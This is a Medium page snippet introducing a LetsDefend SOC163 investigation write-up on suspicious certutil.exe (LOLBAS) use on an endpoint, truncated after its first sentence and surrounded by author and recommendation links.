LetsDefend: Suspicious Certutil.exe Usage-LOLBAS TTPs

LetsDefend — SOC163 WriteUp

Living Off The Land Binaries, Scripts and Libraries


EventID 113

We can kick off our investigation with the CMD history of the compromised endpoint “EricProd” which caused an…




Security Researcher [RED&BLUE]

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A DIF & ToIP joint Statement of Support for Decentralized Identifiers (DIDs) v1.0 as a W3C Standard

Secure Insights with Brian Krause, Director of Worldwide Channels at Idaptive

Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.

Generating a password hash in Linux


{UPDATE} ヤンデレ彼女+PLUS Hack Free Resources Generator

Mini Waterproof Builtin Battery GSM GPS tracker ST-901 for Car motorcycle vehicle 3G WCDMA device…

IoT Bio-metrics

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Michael Koczwara

Michael Koczwara

Security Researcher [RED&BLUE]

More from Medium

Cyberdefenders-Boss Of The SOC v1

Nmap Post Port Scans | TryHackMe (THM)

Unified Kill Chain in Cyber Threat Intelligence

Threat Hunting: How to do it in easy way